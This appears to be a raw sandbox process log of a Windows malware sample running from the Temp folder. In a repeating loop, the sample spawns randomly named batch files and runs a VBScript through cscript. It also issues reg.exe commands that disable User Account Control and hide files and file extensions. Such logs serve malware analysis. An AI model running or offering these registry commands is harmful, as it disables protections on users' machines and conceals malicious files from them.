C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RAMcEssg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rcwsQYUE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xwEUkwQU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JYUYYEwo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TusUQoUQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zcQkYows.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CMcQMAQg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UgAowsAQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ggoEEEkY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hicUQwEk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\syccQMwc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mIAIQQwQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jMAswIoA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vkIAwoAs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vUEIAYEU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LcokMggM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEcEgMYY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iuckgEQs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmQgwEUM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iEMYUIcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GyAcMEEs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bAIkQcsw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jCgUIgMc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mockcUgE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EkEYoEYI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SkAYYQIw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

